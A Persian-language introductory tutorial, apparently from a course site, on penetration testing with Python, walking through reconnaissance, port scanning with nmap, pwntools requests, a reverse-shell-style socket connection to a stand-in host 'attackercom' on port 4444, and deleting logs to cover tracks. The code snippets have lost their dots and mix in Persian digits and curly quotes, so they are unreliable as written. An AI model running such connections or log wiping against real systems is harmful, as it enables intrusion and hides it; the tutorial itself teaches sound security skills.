تست نفوذ با پایتون چیست؟

آموزش تست نفوذ با پایتون  از جمله مهارت های مهمی است که در آن سعی می شود نقاط ضعف و نفوذ سیستم ها و برنامه های کامپیوتری و شبکه ها مورد بررسی و آزمایش قرار گیرد و قبل از این که این نقاط ضعف توسط هکرها مورد سواستفاده قرار بگیرند جلوی آن ها را بگیرند.

یکی از بهترین زبان ها برای تست نفوذ زبان پایتون است. زبان پایتون کتابخانه های زیادی دارد و قدرت بالایی که در اسکریپت نویسی دارد به همین دلایل یادگیری آسانی دارد. به این خاطر برای تست نفوذ از بهترین گزینه هاست.

چرا پایتون برای تست نفوذ؟

پایتون یک زبان برنامه نویسی اصلی در بین متخصصان امنیت سایبری است. اگر علاقمند به آموزش پایتون هستید بد نیست بدانید دلایل انتخاب این زبان برای تست نفوذ عبارتند از :

• کتابخانه های گسترده :  پایتون دارای کتابخانه های خوبی است که در زمینه شبکه رمزنگاری و امنیت به کار می آیند.
• ساده بودن کدنویسی :  برنامه نویسان به سادگی می توانند کدهای تست نفوذ را نوشته و در شبکه های هدف اجرا کنند.
• چند منظوره بودن : پایتون می تواند برای نوشتن اسکریپت های ساده و ساخت ابزارهای پیچیده تست نفوذ استفاده شود.

مراحل تست نفوذ با پایتون

1. جمع آوری اطلاعات (Information Gathering) : اولین مرحله تست نفوذ جمع آوری اطلاعات هدف است در این مرحله تست کننده با استفاده از ابزارهای مختلف اطلاعاتی مثل آدرس IP سیستم عامل پورت ها و سرویس های اجرا شده را به دست می آورد.

پایتون با کمک کتابخانه هایی مثل socket و Scapy می تواند اطلاعات مربوط به شبکه را جمع آوری کند.

python

• import socket

target = ‘۱۹۲۱۶۸۱۱’

print(socketgethostbyname(target))

1. بررسی آسیب پذیری ها : در این مرحله تلاش می شود تا نقاط ضعف و آسیب پذیری های موجود در سیستم و شبکه هدف شناسایی شود. در اینجا ابزارهایی مانند Nmap می توانند به وسیله پایتون استفاده می شوند.

پایتون به کمک کتابخانه هایی مانند  NmapوShodan  می تواند پورت های باز و سرویس های آسیب پذیر را پیدا کند.

• import nmap

scanner = nmapPortScanner()

scannerscan(‘۱۹۲۱۶۸۱۱’, ‘۱-۱۰۲۴’)

for host in scannerall_hosts() :

 print(host, scanner[host]state())

بهره برداری از آسیب پذیری ها (Exploitation) : بعد از شناسایی آسیب پذیری ها نوبت به بهره برداری از این آسیب پذیری ها می رسد. در این جا برای دسترسی غیرمجاز از ابزارها و اکسپلویت های آماده یا کدهای سفارشی استفاده می شود.

بعضی کتابخانه های پایتون مانند pwntools وmetasploit  می توانند در این مرحله مورد استفاده قرار گیرند.

• from pwn import *

p = remote(‘۱۹۲۱۶۸۱۱’, ۸۰)

psend(b’GET HTTP۱۱rnHost : vulnerable-sitecomrnrn’)

print(precv(۴۰۹۶))

1. حفظ دسترسی (Maintaining Access) : بعد از اینکه به سیستم نفوذ شد هکر باید روشی برای حفظ دسترسی خود به سیستم ایجاد کند تا در آینده نیز بتواند از آن راه نفوذ کند.

ابزارهای Reverse Shell و Bind Shell برای این کار استفاده می شوند که با پایتون نیز پیاده سازی می شوند.

• import socket

s = socketsocket(socketAF_INET, socketSOCK_STREAM)

sconnect((‘attackercom’, ۴۴۴۴))

ssend(b’Connection established!’)

1. پاک سازی آثارنفوذ: آخرین مرحله در تست نفوذ پاک کردن تمام ردپاها و شواهدی است که ممکن است باعث شناسایی هکر شود برای این کار باید لاگ ها و فایل های مرتبط با نفوذ حذف شوند.

پایتون کاربردهای بیشتری هم دارد که می توان به استخراج داده از وب اشاره کرد. اگر علاقمند به آموزش وب اسکرپینگ هستید می توانید از آموزش های لرن فایلز استفاده کنید.

ابزارهای پایتون برای تست نفوذ

پایتون ابزارها و کتابخانه های زیادی دارد که برای اهداف مختلفی در تست نفوذ استفاده می شوند. برخی از مهم ترین این ابزارها عبارتند از :

• Scapy : ابزاری برای تحلیل و ساخت پکت های شبکه.
• Nmap : ابزاری برای اسکن پورت ها و شناسایی سرویس ها.
• Pwntools : کتابخانه ای برای توسعه و بهره برداری از اکسپلویت ها.
• Requests : برای ارسال درخواست های HTTP و بررسی آسیب پذیری های مبتنی بر وب.